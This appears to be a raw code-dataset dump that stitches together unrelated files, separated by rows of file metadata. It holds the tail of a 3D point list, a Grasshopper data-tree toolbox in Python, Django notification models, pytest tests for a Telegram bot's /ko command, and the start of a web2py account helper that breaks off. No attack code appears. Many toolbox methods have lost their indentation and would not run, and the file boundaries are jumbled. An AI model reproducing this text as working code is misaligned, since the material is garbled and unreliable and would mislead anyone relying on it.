[0.85085272789,0.276221334934,-0.446935534477],
[0.857896447182,0.413926929235,-0.3044308424],
[0.891307473183,0.380633711815,-0.246351331472],
[0.883275330067,0.348686188459,-0.313436716795],
[0.905284404755,0.277958005667,-0.321246802807],
[0.935745954514,0.239766731858,-0.258633822203],
[0.922915279865,0.202408134937,-0.327503234148],
[0.883275330067,0.348686188459,-0.313436716795],
[0.905284404755,0.277958005667,-0.321246802807],
[0.869839549065,0.313733518124,-0.380723625422],
[0.866019308567,0.468421578407,-0.174905076623],
[0.892938017845,0.434652328491,-0.117213711143],
[0.894335091114,0.409316182137,-0.180623859167],
[0.858619451523,0.509656965733,-0.0549761541188],
[0.8796184659,0.475679844618,0.0],
[0.887796461582,0.456712335348,-0.0568443164229],
[0.915323853493,0.398431301117,-0.0586068555713],
[0.932827115059,0.360324263573,0.0],
[0.940329909325,0.334895044565,-0.0602079555392],
[0.887796461582,0.456712335348,-0.0568443164229],
[0.915323853493,0.398431301117,-0.0586068555713],
[0.892938017845,0.434652328491,-0.117213711143],
[0.960443258286,0.199805602431,-0.193975359201],
[0.978907585144,0.158833146095,-0.128498718143],
[0.97295331955,0.121444880962,-0.196501940489],
[0.961880862713,0.266443610191,-0.0615878328681],
[0.974178731441,0.225778326392,0.0],
[0.979053080082,0.193714544177,-0.0626873448491],
[0.991025745869,0.117650069296,-0.0634539350867],
[0.997029185295,0.0770247355103,0.0],
[0.997179210186,0.0394601933658,-0.0638479366899],
[0.979053080082,0.193714544177,-0.0626873448491],
[0.991025745869,0.117650069296,-0.0634539350867],
[0.978907585144,0.158833146095,-0.128498718143],
[0.894335091114,0.409316182137,-0.180623859167],
[0.920180141926,0.34457308054,-0.185843646526],
[0.891307473183,0.380633711815,-0.246351331472],
[0.940329909325,0.334895044565,-0.0602079555392],
[0.961880862713,0.266443610191,-0.0615878328681],
[0.943842172623,0.306287169456,-0.123895764351],
[0.942551255226,0.274516820908,-0.190361812711],
[0.960443258286,0.199805602431,-0.193975359201],
[0.935745954514,0.239766731858,-0.258633822203],
[0.943842172623,0.306287169456,-0.123895764351],
[0.942551255226,0.274516820908,-0.190361812711],
[0.920180141926,0.34457308054,-0.185843646526],
[0.85085272789,-0.276221334934,-0.446935534477],
[0.869839549065,-0.313733518124,-0.380723625422],
[0.830415487289,-0.346611320972,-0.436200261116],
[0.922915279865,-0.202408134937,-0.327503234148],
[0.935745954514,-0.239766731858,-0.258633822203],
[0.905284404755,-0.277958005667,-0.321246802807],
[0.883275330067,-0.348686188459,-0.313436716795],
[0.891307473183,-0.380633711815,-0.246351331472],
[0.857896447182,-0.413926929235,-0.3044308424],
[0.905284404755,-0.277958005667,-0.321246802807],
[0.883275330067,-0.348686188459,-0.313436716795],
[0.869839549065,-0.313733518124,-0.380723625422],
[0.97295331955,-0.121444880962,-0.196501940489],
[0.978907585144,-0.158833146095,-0.128498718143],
[0.960443258286,-0.199805602431,-0.193975359201],
[0.997179210186,-0.0394601933658,-0.0638479366899],
[0.997029185295,-0.0770247355103,0.0],
[0.991025745869,-0.117650069296,-0.0634539350867],
[0.979053080082,-0.193714544177,-0.0626873448491],
[0.974178731441,-0.225778326392,0.0],
[0.961880862713,-0.266443610191,-0.0615878328681],
[0.991025745869,-0.117650069296,-0.0634539350867],
[0.979053080082,-0.193714544177,-0.0626873448491],
[0.978907585144,-0.158833146095,-0.128498718143],
[0.894335091114,-0.409316182137,-0.180623859167],
[0.892938017845,-0.434652328491,-0.117213711143],
[0.866019308567,-0.468421578407,-0.174905076623],
[0.940329909325,-0.334895044565,-0.0602079555392],
[0.932827115059,-0.360324263573,0.0],
[0.915323853493,-0.398431301117,-0.0586068555713],
[0.887796461582,-0.456712335348,-0.0568443164229],
[0.8796184659,-0.475679844618,0.0],
[0.858619451523,-0.509656965733,-0.0549761541188],
[0.915323853493,-0.398431301117,-0.0586068555713],
[0.887796461582,-0.456712335348,-0.0568443164229],
[0.892938017845,-0.434652328491,-0.117213711143],
[0.960443258286,-0.199805602431,-0.193975359201],
[0.942551255226,-0.274516820908,-0.190361812711],
[0.935745954514,-0.239766731858,-0.258633822203],
[0.961880862713,-0.266443610191,-0.0615878328681],
[0.940329909325,-0.334895044565,-0.0602079555392],
[0.943842172623,-0.306287169456,-0.123895764351],
[0.920180141926,-0.34457308054,-0.185843646526],
[0.894335091114,-0.409316182137,-0.180623859167],
[0.891307473183,-0.380633711815,-0.246351331472],
[0.943842172623,-0.306287169456,-0.123895764351],
[0.920180141926,-0.34457308054,-0.185843646526],
[0.942551255226,-0.274516820908,-0.190361812711],
[0.85085272789,0.276221334934,-0.446935534477],
[0.867211103439,0.20109423995,-0.455528259277],
[0.826465010643,0.236761152744,-0.510783493519],
[0.922915279865,0.202408134937,-0.327503234148],
[0.935258030891,0.123069040477,-0.33188316226],
[0.903840482235,0.162998497486,-0.395605653524],
[0.878655850887,0.122248865664,-0.461539924145],
[0.88455080986,0.0410230122507,-0.464636415243],
[0.847858190536,0.0809632539749,-0.524005174637],
[0.903840482235,0.162998497486,-0.395605653524],
[0.878655850887,0.122248865664,-0.461539924145],
[0.867211103439,0.20109423995,-0.455528259277],
[0.97295331955,0.121444880962,-0.196501940489],
[0.979394435883,0.0407496243715,-0.197802826762],
[0.960611641407,0.0820460245013,-0.265506535769],
[0.997179210186,0.0394601933658,-0.0638479366899],
[0.997179210186,-0.0394601933658,-0.0638479366899],
[0.991494178772,0.0,-0.130150929093],
[0.979394435883,-0.0407496243715,-0.197802826762],
[0.97295331955,-0.121444880962,-0.196501940489],
[0.960611641407,-0.0820460245013,-0.265506535769],
[0.991494178772,0.0,-0.130150929093],
[0.979394435883,-0.0407496243715,-0.197802826762],
[0.979394435883,0.0407496243715,-0.197802826762],
[0.88455080986,-0.0410230122507,-0.464636415243],
[0.878655850887,-0.122248865664,-0.461539924145],
[0.847858190536,-0.0809632539749,-0.524005174637],
[0.935258030891,-0.123069040477,-0.33188316226],
[0.922915279865,-0.202408134937,-0.327503234148],
[0.903840482235,-0.162998497486,-0.395605653524],
[0.867211103439,-0.20109423995,-0.455528259277],
[0.85085272789,-0.276221334934,-0.446935534477],
[0.826465010643,-0.236761152744,-0.510783493519],
[0.903840482235,-0.162998497486,-0.395605653524],
[0.867211103439,-0.20109423995,-0.455528259277],
[0.878655850887,-0.122248865664,-0.461539924145],
[0.960611641407,0.0820460245013,-0.265506535769],
[0.941618084908,0.04130198434,-0.334140062332],
[0.935258030891,0.123069040477,-0.33188316226],
[0.960611641407,-0.0820460245013,-0.265506535769],
[0.935258030891,-0.123069040477,-0.33188316226],
[0.941618084908,-0.04130198434,-0.334140062332],
[0.916092038155,0.0,-0.400968074799],
[0.88455080986,-0.0410230122507,-0.464636415243],
[0.88455080986,0.0410230122507,-0.464636415243],
[0.941618084908,-0.04130198434,-0.334140062332],
[0.916092038155,0.0,-0.400968074799],
[0.941618084908,0.04130198434,-0.334140062332]]
return points
class Numbers:
    @staticmethod
    def isclose(a, b, rel_tol=1e-09, abs_tol=1e-09):
        """Return True when a and b are equal within a relative or absolute tolerance."""
        gap = abs(a - b)
        # close if within the absolute floor, or within the relative band
        # scaled by the larger magnitude of the two operands
        return gap <= abs_tol or gap <= rel_tol * max(abs(a), abs(b))
class Data:
@staticmethod
def list_to_datatree(raggedList):
    """Python to Grasshopper (from Chen Jingcheng)"""
    # one tree branch per sub-list, keyed by its position in the outer list
    tree = DataTree[object]()
    for branch_index, branch in enumerate(raggedList):
        items = [element for element in branch]
        tree.AddRange(items, GH_Path(branch_index))
    return tree
@staticmethod
def datatree_to_list(aTree):
    """Grasshopper to Python (from Chen Jingcheng)"""
    # one Python sub-list per tree branch, in branch order
    branches = []
    for branch_index in range(aTree.BranchCount):
        branch = aTree.Branch(branch_index)
        branches.append([branch[j] for j in range(len(branch))])
    return branches
@staticmethod
def flatten_integer_list(l):
"""Flatten a nested list of integers"""
if type(l) is list:
new_l=[]
num = None
for i in range(len(str(l))):
char = str(l)[i]
if char != '[' and char != ']' and char!= ' ' and char != ',':
if num == None: num = char
else: num += char
elif num != None:
new_l.append(int(num))
num = None
return(new_l)
else: return l
@staticmethod
def flatten_list(list):
"""Flatten a list of list (not higher degrees!)"""
flatlist = []
for sublist in list:
for item in sublist:
flatlist.append(item)
return flatlist
@staticmethod
def islistsimilar(list1,list2):
"""check if two lists contain the same integers"""
state = False
if len(list1) == len(list2):
sort1=copy.deepcopy(list1)
sort2=copy.deepcopy(list2)
sort1.sort()
sort2.sort()
if sort1 == sort2:
state = True
return state
@staticmethod
def list_of_empty_lists(n):
"""Generate a list of n empty lists"""
list=[]
for i in range(n):
list.append([])
return list
@staticmethod
def sort_list_sync(list_to_sort, key_list):
"""Sort list synchroneously using keys"""
return [list_to_sort[i] for i in key_list]
@staticmethod
def break_list(alist):
"""return list first item if parameter is a list"""
try : return alist[0]
except: return alist
@staticmethod
def seq_to_steps(seq):
step=[]
steps=[]
for i in range(len(str(seq))):
char = str(seq)[i]
if char == '[':
index = 0
step.append(index)
elif char == ']':
del step[-1]
index = 0
elif char == ' ':
pass
elif char == ',':
step[-1] += 1
if char == ',' or char == '[':
steps.append(copy.deepcopy(step))
return(steps)
@staticmethod
def deepest_steps(seq):
step=[]
steps=[]
for i in range(len(str(seq))):
char = str(seq)[i]
if char == '[':
index = 0
step.append(index)
elif char == ']':
del step[-1]
index = 0
elif char == ' ':
pass
elif char == ',':
step[-1] += 1
else:
steps.append(copy.deepcopy(step))
return(steps)
@staticmethod
def get_item_from_path(l, path):
l = copy.deepcopy(l)
if type(path) == list:
for i in range(len(path)):
l = l[path[i]]
return l
@staticmethod
def order_sequence(steps):
#tree as a list of paths
#path as a list of indices
new_steps = []
for step in copy.deepcopy(steps):
depth = 0
ls = len(steps)
# compute current tree depth
for j in range(ls):
if len(steps[j])-1 > depth : depth = len(steps[j])-1
# append current first deepest item
for j in range(ls):
if len(steps[j])-1 == depth :
new_steps.append(steps[j])
del(steps[j])
break
return new_steps
@staticmethod
def seq_to_tree(text):
    """Build a Grasshopper DataTree from a sequence expressed as text."""
    sequence = ast.literal_eval(text)
    tree = DataTree[object]()
    # add one tree item per leaf, at the leaf's path in the sequence
    for path in Toolbox.Data.deepest_steps(sequence):
        leaf = Toolbox.Data.get_item_from_path(sequence, path)
        tree.Add(leaf, GH_Path(*path))
    return tree
@staticmethod
def tree_to_seq(tree):
    """Serialize a Grasshopper DataTree into a nested-sequence string.

    Inverse of seq_to_tree: branch paths like "{0;1;2}" are parsed back
    into index lists, and opening/closing brackets are emitted from the
    ancestry relationships between consecutive paths.
    """
    # get tree paths as list of int
    paths = []
    parents = []        # direct parent of each path ('M' for top-level paths)
    all_parents = []    # every ancestor of each path, nearest first, ending with 'M'
    for i in range(tree.BranchCount):
        # parse "{a;b;c}" into [a, b, c], accumulating multi-digit numbers
        path_string = tree.Path(i).ToString()
        path = []
        num = None
        for char in path_string:
            if char == '{' or char == ';' or char == '}':
                if num != None:
                    path.append(num)
                    num = None
            else:
                # digit character: extend the number being accumulated
                if num == None: num = int(char)
                else: num = int(str(num) + char)
        paths.append(path)
        #parents
        all_par = []
        if len(path) == 1:
            # 'M' is a sentinel standing in for the (implicit) root
            parents.append('M')
        else:
            parents.append(path[0:len(path)-1])
            # collect every ancestor prefix, nearest ancestor first
            for j in range(len(path)-1):
                all_par.append(path[0:len(path)-1-j])
        all_par.append('M')
        all_parents.append(all_par)
    # create sequence from paths
    seq_as_string = ''
    for i in range(len(paths)):
        path = paths[i]
        #add coma
        if i != 0: seq_as_string += ','
        #if parent doesn't exists before, add opening parenthesis
        if (parents[i] in parents[0:i]) is False:
            #add one parenthesis for each zero in path.
            # trailing zeros mark how many new branches open at this item
            last_zeros = 0
            for j in range(len(path)):
                if path[j] == 0: last_zeros += 1
                else: last_zeros = 0
            seq_as_string += '[' * last_zeros
        #add number
        seq_as_string += str(tree.AllData()[i])
        #if parent doesn't exist after, add closing parenthesis
        if (parents[i] in parents[i+1:len(parents)]) is False:
            #last parenthesis of the sequence
            if i+1 == len(paths):
                seq_as_string += ']' * len(path)
            else:
                # close as many levels as separate this path from the first
                # ancestor it shares with the next path
                count = 0
                search = True
                for j in range(len(all_parents[i])):
                    if search == True:
                        for k in range(len(all_parents[i+1])):
                            if search == True:
                                if all_parents[i][j] == all_parents[i+1][k]:
                                    count = j
                                    search = False
                seq_as_string += ']' * count
    return seq_as_string
@staticmethod
def test_seq(seq):
flag = False
if (type(seq) is str):
if len(seq) > 2:
if seq[0] == '[' and seq[-1] == ']':
comas=0
ophook=0
clhook=0
numbers=[]
num = ''
flag = True
for i in range(len(seq)):
if seq[i] == '[' : ophook += 1
elif seq[i] == ']' : clhook += 1
elif seq[i] == ',' : comas += 1
elif seq[i] == ' ': pass
elif seq[i] in ['0','1','2','3','4','5','6','7','8','9'] :
num += seq[i]
if seq[i+1] not in ['0','1','2','3','4','5','6','7','8','9']:
numbers.append(int(num))
num = ''
else: raise Exception( 'Invalid character in sequence.')
if ophook != clhook : raise Exception( 'Missing hook(s) in sequence.')
if comas != len(numbers)-1 : raise Exception( 'Missing coma(s) in sequence.')
#if Toolbox.Data.islistsimilar(numbers, range(min(numbers), min(numbers)+len(numbers))) is False: raise Exception( 'Missing number(s) in sequence.')
else: raise Exception( 'Sequence should start and end with hooks.')
else: raise Exception( 'Sequence should be expressed as a string.')
if flag == False: raise Exception( 'Error is sequence input.')
return flag
@staticmethod
def reorder_sequence(seq):
    """Renumber the integers of a nested sequence string consecutively from 0.

    Structure characters ('[', ']', ',', ' ') are kept; each number is
    replaced, in order of appearance, by 0, 1, 2, ... Fixes a potential
    IndexError on the seq[i+1] lookahead when the text ends with a digit,
    and drops the dead `temp_num` accumulator that was built but never read.
    """
    text = str(seq)
    total = len(Toolbox.Data.flatten_integer_list(ast.literal_eval(text)))
    replacements = iter(range(total))
    structural = '[], '
    length = len(text)
    new_seq = ''
    for i, char in enumerate(text):
        if char in structural:
            new_seq += char
        elif i + 1 == length or text[i+1] in structural:
            # last character of a number: emit its replacement value
            new_seq += str(next(replacements))
        # else: interior digit of a multi-digit number, skipped
    return new_seq
| 60.179757 | 231 | 0.55737 | 50,678 | 520,254 | 5.655807 | 0.027172 | 0.00568 | 0.004176 | 0.003377 | 0.859468 | 0.837631 | 0.817127 | 0.784269 | 0.772176 | 0.765708 | 0 | 0.548754 | 0.313324 | 520,254 | 8,644 | 232 | 60.186719 | 0.253565 | 0.02307 | 0 | 0.763444 | 0 | 0 | 0.006662 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017499 | false | 0.001533 | 0.00115 | 0.001022 | 0.03487 | 0.001022 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
590c6c443827492ae11a0659b384dd4279f8b096 | 4,320 | py | Python | hqq_notice/models.py | yaoruda/DRFLearning | 6b17ef0d557142e8563d80788351f8b7ab94f248 | [
"MIT"
] | 1 | 2018-09-21T09:42:02.000Z | 2018-09-21T09:42:02.000Z | hqq_notice/models.py | yaoruda/DRFLearning | 6b17ef0d557142e8563d80788351f8b7ab94f248 | [
"MIT"
] | null | null | null | hqq_notice/models.py | yaoruda/DRFLearning | 6b17ef0d557142e8563d80788351f8b7ab94f248 | [
"MIT"
] | null | null | null | from django.db import models
from hqq_user.models import MyUser
from hqq_group.models import Group, ApplicationForGroup
from hqq_topic.models import Topic
from hqq_forum.models import Forum
class TextNotice(models.Model):
"""
通知
"""
id = models.CharField(max_length=32, verbose_name='主键', primary_key=True)
user = models.ForeignKey(MyUser, on_delete=models.CASCADE, verbose_name='接收者')
title = models.CharField(max_length=50, verbose_name='通知内容')
text = models.CharField(max_length=100, verbose_name='通知内容')
state = models.SmallIntegerField(
verbose_name='状态',
choices=((0, '正常'), (1, '删除')),
default=0
)
create_time = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
update_time = models.DateTimeField(auto_now=True, verbose_name='更新时间')
delete_mark = models.SmallIntegerField(
verbose_name='删除标记',
choices=((0, '正常'), (1, '删除')),
default=0
)
class ApplyGroupNotice(models.Model):
"""
加群通知
"""
id = models.CharField(max_length=32, verbose_name='主键', primary_key=True)
user = models.ForeignKey(MyUser, on_delete=models.CASCADE, verbose_name='接收者')
title = models.CharField(max_length=50, verbose_name='通知内容')
text = models.CharField(max_length=100, verbose_name='通知内容')
application = models.ForeignKey(ApplicationForGroup, on_delete=models.CASCADE, verbose_name='群信息')
apply_state = models.SmallIntegerField(
verbose_name='审核状态',
choices=((0, '待审核'), (1, '同意'), (2, '拒绝')),
default=0
)
state = models.SmallIntegerField(
verbose_name='状态',
choices=((0, '正常'), (1, '删除')),
default=0
)
create_time = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
update_time = models.DateTimeField(auto_now=True, verbose_name='更新时间')
delete_mark = models.SmallIntegerField(
verbose_name='删除标记',
choices=((0, '正常'), (1, '删除')),
default=0
)
class JumpGroupNotice(models.Model):
"""
跳转到群的通知
"""
id = models.CharField(max_length=32, verbose_name='主键', primary_key=True)
user = models.ForeignKey(MyUser, on_delete=models.CASCADE, verbose_name='接收者')
title = models.CharField(max_length=50, verbose_name='通知内容')
text = models.CharField(max_length=100, verbose_name='通知内容')
group = models.ForeignKey(Group, on_delete=models.CASCADE, verbose_name='群聊')
state = models.SmallIntegerField(
verbose_name='状态',
choices=((0, '正常'), (1, '删除')),
default=0
)
create_time = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
update_time = models.DateTimeField(auto_now=True, verbose_name='更新时间')
delete_mark = models.SmallIntegerField(
verbose_name='删除标记',
choices=((0, '正常'), (1, '删除')),
default=0
)
class JumpTopicNotice(models.Model):
"""
跳转到全部话题界面的通知
"""
id = models.CharField(max_length=32, verbose_name='主键', primary_key=True)
title = models.CharField(max_length=50, verbose_name='通知内容')
text = models.CharField(max_length=100, verbose_name='通知内容')
topic = models.ForeignKey(Topic, on_delete=models.CASCADE, verbose_name='群聊')
state = models.SmallIntegerField(
verbose_name='状态',
choices=((0, '正常'), (1, '删除')),
default=0
)
create_time = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
update_time = models.DateTimeField(auto_now=True, verbose_name='更新时间')
delete_mark = models.SmallIntegerField(
verbose_name='删除标记',
choices=((0, '正常'), (1, '删除')),
default=0
)
class TextNoticeToAll(models.Model):
"""
全员通知
"""
id = models.CharField(max_length=32, verbose_name='主键', primary_key=True)
title = models.CharField(max_length=50, verbose_name='通知内容')
text = models.CharField(max_length=100, verbose_name='通知内容')
state = models.SmallIntegerField(
verbose_name='状态',
choices=((0, '正常'), (1, '删除')),
default=0
)
create_time = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
update_time = models.DateTimeField(auto_now=True, verbose_name='更新时间')
delete_mark = models.SmallIntegerField(
verbose_name='删除标记',
choices=((0, '正常'), (1, '删除')),
default=0
)
| 35.409836 | 102 | 0.660648 | 527 | 4,320 | 5.220114 | 0.140417 | 0.167939 | 0.098146 | 0.130862 | 0.834969 | 0.820792 | 0.80916 | 0.80916 | 0.80916 | 0.80916 | 0 | 0.019822 | 0.194213 | 4,320 | 121 | 103 | 35.702479 | 0.770468 | 0.007639 | 0 | 0.71875 | 0 | 0 | 0.044408 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052083 | 0 | 0.541667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
594793a7cbbb69f64c8be10bea2b40c18a1a3fba | 7,447 | py | Python | tests/test_send_ko.py | Izeren/dr_tg | 862c996200177e033149152e33985bfb114c758d | [
"Apache-2.0"
] | 1 | 2021-11-11T15:05:46.000Z | 2021-11-11T15:05:46.000Z | tests/test_send_ko.py | Izeren/dr_tg | 862c996200177e033149152e33985bfb114c758d | [
"Apache-2.0"
] | 40 | 2020-10-09T21:13:54.000Z | 2021-12-02T00:54:31.000Z | tests/test_send_ko.py | Izeren/pewpewbot | 862c996200177e033149152e33985bfb114c758d | [
"Apache-2.0"
] | null | null | null | from asyncio import Future
import pytest
from mock import Mock, call
from pytest_mock import MockerFixture
from model_parsing_utils import parse_koline_from_string
from pewpewbot.commands_processing import send_ko, process_tip
from tests.mock_utils import mock_manager, get_pin_message_to_mock_tip_for_manager_with_ko, mock_message, \
KOLINE_DEFAULT_PARSED, KOLINE_MULTISECTOR_BONUS_CODE_UP
@pytest.mark.asyncio
async def test_with_caption_no_tip(mocker: MockerFixture):
# given
message_mock = mock_message('/ko')
manager_mock = mock_manager(KOLINE_DEFAULT_PARSED)
full_view_mock = mocker.patch('pewpewbot.views.sector_default_ko_message', return_value='mocked_view')
# when
await send_ko(message_mock, manager_mock, **{'command_name': 'ko', 'ko_caption': 'mocked_caption\n'})
# then
full_view_mock.assert_called_once_with(manager_mock.state.koline.sectors[0])
message_mock.reply.assert_called_once_with('mocked_caption\nmocked_view\n', parse_mode='Markdown')
@pytest.mark.asyncio
async def test_with_caption_with_tip(mocker: MockerFixture):
# given
message_mock = mock_message('/ko')
manager_mock = mock_manager()
pin_message_mock = get_pin_message_to_mock_tip_for_manager_with_ko(manager=manager_mock)
future_koline = Future()
future_koline.set_result(manager_mock.state.koline)
manager_mock.get_or_load_and_parse_koline = Mock(return_value=future_koline)
full_view_mock = mocker.patch('pewpewbot.views.sector_with_tips_ko_message', return_value='mocked_view')
# when
await process_tip(pin_message_mock, manager_mock, **{'command_name': 'tip'})
await send_ko(message_mock, manager_mock, **{'command_name': 'ko', 'ko_caption': 'mocked_caption\n'})
# then
full_view_mock.assert_called_once_with(manager_mock.state.koline.sectors[0], manager_mock.state.tip[0])
message_mock.reply.assert_called_once_with('mocked_caption\nmocked_view\n', parse_mode='Markdown')
@pytest.mark.asyncio
async def test_no_caption_no_tip(mocker: MockerFixture):
# given
message_mock = mock_message('/ko')
manager_mock = mock_manager(KOLINE_DEFAULT_PARSED)
full_view_mock = mocker.patch('pewpewbot.views.sector_default_ko_message', return_value='mocked_view')
# when
await send_ko(message_mock, manager_mock, **{'command_name': 'ko'})
# then
full_view_mock.assert_called_once_with(manager_mock.state.koline.sectors[0])
message_mock.reply.assert_called_once_with('mocked_view\n', parse_mode='Markdown')
@pytest.mark.asyncio
async def test_no_caption_with_tip(mocker: MockerFixture):
# given
message_mock = mock_message('/ko')
manager_mock = mock_manager()
pin_message_mock = get_pin_message_to_mock_tip_for_manager_with_ko(manager=manager_mock)
future_koline = Future()
future_koline.set_result(manager_mock.state.koline)
manager_mock.get_or_load_and_parse_koline = Mock(return_value=future_koline)
full_view_mock = mocker.patch('pewpewbot.views.sector_with_tips_ko_message', return_value='mocked_view')
# when
await process_tip(pin_message_mock, manager_mock, **{'command_name': 'tip'})
await send_ko(message_mock, manager_mock, **{'command_name': 'ko'})
# then
full_view_mock.assert_called_once_with(manager_mock.state.koline.sectors[0], manager_mock.state.tip[0])
message_mock.reply.assert_called_once_with('mocked_view\n', parse_mode='Markdown')
@pytest.mark.asyncio
async def test_with_caption_with_tip_multi_sector(mocker: MockerFixture):
# given
message_mock = mock_message('/ko')
manager_mock = mock_manager()
pin_message_mock = get_pin_message_to_mock_tip_for_manager_with_ko(
koline=parse_koline_from_string(KOLINE_MULTISECTOR_BONUS_CODE_UP),
manager=manager_mock
)
future_koline = Future()
future_koline.set_result(manager_mock.state.koline)
manager_mock.get_or_load_and_parse_koline = Mock(return_value=future_koline)
full_view_mock = mocker.patch('pewpewbot.views.sector_with_tips_ko_message', return_value='mocked_view')
# when
await process_tip(pin_message_mock, manager_mock, **{'command_name': 'tip'})
await send_ko(message_mock, manager_mock, **{'command_name': 'ko', 'ko_caption': 'mocked_caption\n'})
# then
full_view_mock.has_calls([
call(manager_mock.state.koline.sectors[0], manager_mock.state.tip[0]),
call(manager_mock.state.koline.sectors[1], manager_mock.state.tip[1]),
])
message_mock.reply.assert_called_once_with('mocked_caption\nmocked_view\nmocked_view\n', parse_mode='Markdown')
@pytest.mark.asyncio
async def test_no_caption_with_tip_multi_sector(mocker: MockerFixture):
    """/ko without a caption over a multi-sector koline renders every sector with its tip."""
    # given
    message_mock = mock_message('/ko')
    manager_mock = mock_manager()
    pin_message_mock = get_pin_message_to_mock_tip_for_manager_with_ko(
        koline=parse_koline_from_string(KOLINE_MULTISECTOR_BONUS_CODE_UP),
        manager=manager_mock
    )
    future_koline = Future()
    future_koline.set_result(manager_mock.state.koline)
    manager_mock.get_or_load_and_parse_koline = Mock(return_value=future_koline)
    full_view_mock = mocker.patch('pewpewbot.views.sector_with_tips_ko_message', return_value='mocked_view')
    # when
    await process_tip(pin_message_mock, manager_mock, command_name='tip')
    await send_ko(message_mock, manager_mock, command_name='ko')
    # then
    # Bug fix: Mock.has_calls() is NOT an assertion -- it merely creates a child
    # mock and always "passes".  assert_has_calls() actually verifies the calls.
    full_view_mock.assert_has_calls([
        call(manager_mock.state.koline.sectors[0], manager_mock.state.tip[0]),
        call(manager_mock.state.koline.sectors[1], manager_mock.state.tip[1]),
    ])
    message_mock.reply.assert_called_once_with('mocked_view\nmocked_view\n', parse_mode='Markdown')
@pytest.mark.asyncio
async def test_with_caption_no_tip_multi_sector(mocker: MockerFixture):
    """/ko with a caption and no tips renders every sector with the default view."""
    # given
    message_mock = mock_message('/ko')
    manager_mock = mock_manager(parse_koline_from_string(KOLINE_MULTISECTOR_BONUS_CODE_UP))
    future_koline = Future()
    future_koline.set_result(manager_mock.state.koline)
    manager_mock.get_or_load_and_parse_koline = Mock(return_value=future_koline)
    full_view_mock = mocker.patch('pewpewbot.views.sector_default_ko_message', return_value='mocked_view')
    # when
    await send_ko(message_mock, manager_mock, command_name='ko', ko_caption='mocked_caption\n')
    # then
    # Bug fix: Mock.has_calls() is NOT an assertion -- it merely creates a child
    # mock and always "passes".  assert_has_calls() actually verifies the calls.
    full_view_mock.assert_has_calls([
        call(manager_mock.state.koline.sectors[0]),
        call(manager_mock.state.koline.sectors[1]),
    ])
    message_mock.reply.assert_called_once_with('mocked_caption\nmocked_view\nmocked_view\n', parse_mode='Markdown')
@pytest.mark.asyncio
async def test_no_caption_no_tip_multi_sector(mocker: MockerFixture):
    """/ko without a caption and without tips renders every sector with the default view."""
    # given
    message_mock = mock_message('/ko')
    manager_mock = mock_manager(parse_koline_from_string(KOLINE_MULTISECTOR_BONUS_CODE_UP))
    future_koline = Future()
    future_koline.set_result(manager_mock.state.koline)
    manager_mock.get_or_load_and_parse_koline = Mock(return_value=future_koline)
    full_view_mock = mocker.patch('pewpewbot.views.sector_default_ko_message', return_value='mocked_view')
    # when
    await send_ko(message_mock, manager_mock, command_name='ko')
    # then
    # Bug fix: Mock.has_calls() is NOT an assertion -- it merely creates a child
    # mock and always "passes".  assert_has_calls() actually verifies the calls.
    full_view_mock.assert_has_calls([
        call(manager_mock.state.koline.sectors[0]),
        call(manager_mock.state.koline.sectors[1]),
    ])
    message_mock.reply.assert_called_once_with('mocked_view\nmocked_view\n', parse_mode='Markdown')
| 42.554286 | 115 | 0.770377 | 1,059 | 7,447 | 4.96695 | 0.07271 | 0.112928 | 0.073004 | 0.075285 | 0.951331 | 0.946008 | 0.946008 | 0.946008 | 0.946008 | 0.946008 | 0 | 0.002758 | 0.123674 | 7,447 | 174 | 116 | 42.798851 | 0.803249 | 0.017054 | 0 | 0.844828 | 0 | 0 | 0.138177 | 0.072653 | 0 | 0 | 0 | 0 | 0.103448 | 1 | 0 | false | 0 | 0.060345 | 0 | 0.060345 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3cedfb20fc9d244746c196a98e91a8300f72ffd1 | 8,117 | py | Python | web2py/applications/smc/modules/ednet/w2py.py | aduckworth1969/smc | b1771d9ed68f0e35f46271aab5b1e1fab363e3d9 | [
"MIT"
] | 1 | 2018-04-19T05:09:06.000Z | 2018-04-19T05:09:06.000Z | web2py/applications/smc/modules/ednet/w2py.py | aduckworth1969/smc | b1771d9ed68f0e35f46271aab5b1e1fab363e3d9 | [
"MIT"
] | 14 | 2018-03-04T22:56:41.000Z | 2020-12-10T19:49:43.000Z | web2py/applications/smc/modules/ednet/w2py.py | aduckworth1969/smc | b1771d9ed68f0e35f46271aab5b1e1fab363e3d9 | [
"MIT"
] | 2 | 2020-09-18T15:12:26.000Z | 2020-11-10T22:09:59.000Z | # -*- coding: utf-8 -*-
from gluon import *
from gluon import current
from .appsettings import AppSettings
# Web2PyAPIClass
class W2Py:
    """
    Static helper API for synchronising student and faculty accounts with the
    web2py auth tables.

    Every method pulls the live ``db`` (and, where needed, ``auth``) objects
    from ``gluon.current``, so calls must happen inside a web2py request or
    another context where ``current`` is populated.  Account data is mirrored
    between ``auth_user`` and the ``student_info`` / ``faculty_info`` tables.
    """

    def __init__(self):
        # No instance state -- the class only exposes static methods.
        pass

    @staticmethod
    def Test():
        """Trivial sanity-check method; always returns the string "test"."""
        return "test"

    @staticmethod
    def SetStudentPassword(user_name, new_password, update_db=True):
        """
        Set the password for every student account matching *user_name*.

